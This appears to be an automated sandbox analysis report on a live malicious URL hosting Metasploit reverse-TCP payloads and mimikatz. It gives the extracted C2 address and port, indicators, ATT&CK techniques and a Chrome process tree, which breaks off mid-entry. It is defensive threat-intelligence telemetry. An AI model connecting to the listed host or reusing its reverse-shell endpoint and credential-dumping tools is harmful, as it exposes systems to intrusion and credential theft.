metasploit | hxxp://89[.]197[.]154[.]116/?C=M;O=D

Analysis

max time kernel
116s
max time network
296s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28-01-2025 23:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://89.197.154.116/?C=M;O=D

Score

10^/10

metasploit mimikatz backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

89.197.154.116:7810

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/files/0x000b00000001961d-745.dat	mimikatz

Blocklisted process makes network request 10 IoCs

flow	pid	Process
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe
28	1564	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3032	powershell.exe
2128	powershell.exe
1640	powershell.exe
1564	powershell.exe

Downloads MZ/PE file 7 IoCs

flow	pid	Process
24	2816	chrome.exe
45	2816	chrome.exe
79	2816	chrome.exe
57	2816	chrome.exe
17	2816	chrome.exe
17	2816	chrome.exe
18	2816	chrome.exe

Executes dropped EXE 12 IoCs

pid	Process
2964	ciscotest.exe
2996	File.exe
2588	AdFind.exe
796	Transfer2.exe
524	Transfer3.exe
1624	Excel.exe
1584	Debug.exe
2188	Bugs.exe
2212	mimikatz.exe
3020	Rar.exe
3068	retest.exe
3032	cistest.exe

Loads dropped DLL 13 IoCs

pid	Process
992	chrome.exe
2204	chrome.exe
2360	chrome.exe
2360	chrome.exe
1752	chrome.exe
1088	chrome.exe
2360	chrome.exe
2360	chrome.exe
288	chrome.exe
2896	chrome.exe
2360	chrome.exe
2360	chrome.exe
1200	Process not Found

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Transfer2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	retest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cistest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bugs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ciscotest.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AdFind.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Transfer3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Debug.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7019a1f9dc71db01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d43b7b2baaf8a24bafe4661a657d3e6700000000020000000000106600000001000020000000257188c2ed99140488a25a1280cac05bf69799391b9e571c9fed9856f727344d000000000e8000000002000020000000d8aca9f8f07d034a8995c5ce840332a9ff2b8cffdd012c62d16c81635d8be15790000000538aab14f7e9fc6063e0927540d4b524d00672a571b6e8f1e20eb4ee0dc1ca52f239c5f7f6ad6c0cdda9694dd7d395c9d24fec5fe4aa3a9c977592a29fbf4369e746fdb7fae9e651b7adbfc5a9e5d6cba8981cebf4c034780646abb7fe4cdb0ed10e979253bd10183bf7a2d34246565666850a5d5b943e5612c5af5cfd34e7e1a5097a41cfe9b5686a009392dc99e56e40000000b30ccfe26b75b40f944f1de64388587db658ebe03c7ef9d8b113fbedc4b1504063c7420c39668a71b83e79e21760e66ba179ca2b6a43bdcaabf4c67fc9174088	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d43b7b2baaf8a24bafe4661a657d3e6700000000020000000000106600000001000020000000df6ac34aeccbe742b2864459a0a3c44c84bd33262d90e6a896f31a04d7f3f9d5000000000e800000000200002000000096dd96f486845e5e8d174a261e781c4f4e7f45beec796d278a5c72b50bec18f9200000006ea52bafa729f26d9ae9f477023f635d47c9174ce8873b28a76984d9e628e41240000000bc4ab1c4ba7bcba7761277f8afe117efd4a8e4e1288df7513cd837dc2049777fc049154502e6a2b0bceb67745edb975266ccfd472db90be6fd61037c92394974	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{2349B5C1-DDD0-11EF-80CF-C28ADB222BBA} = "0"	iexplore.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2360	chrome.exe
2360	chrome.exe
652	powershell.exe
3032	powershell.exe
1640	powershell.exe
1564	powershell.exe
620	powershell.exe
2128	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe
Token: SeShutdownPrivilege	2360	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe
2360	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2404	iexplore.exe
2404	iexplore.exe
2708	IEXPLORE.EXE
2708	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 2940	2360	chrome.exe	31
PID 2360 wrote to memory of 2940	2360	chrome.exe	31
PID 2360 wrote to memory of 2940	2360	chrome.exe	31
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2892	2360	chrome.exe	33
PID 2360 wrote to memory of 2816	2360	chrome.exe	34
PID 2360 wrote to memory of 2816	2360	chrome.exe	34
PID 2360 wrote to memory of 2816	2360	chrome.exe	34
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35
PID 2360 wrote to memory of 2784	2360	chrome.exe	35

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://89.197.154.116/?C=M;O=D
1⤵
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6f09758,0x7fef6f09768,0x7fef6f09778
  2⤵
  PID:2940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1188 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:2
  2⤵
  PID:2892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Downloads MZ/PE file
  PID:2816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1648 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2088 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2332 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1252 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:2
  2⤵
  PID:2016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3000 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3324 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2620 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3548 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3608 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2380 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1328
- C:\Users\Admin\Downloads\ciscotest.exe
  "C:\Users\Admin\Downloads\ciscotest.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3616 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3056 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3140 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3068 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3032 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
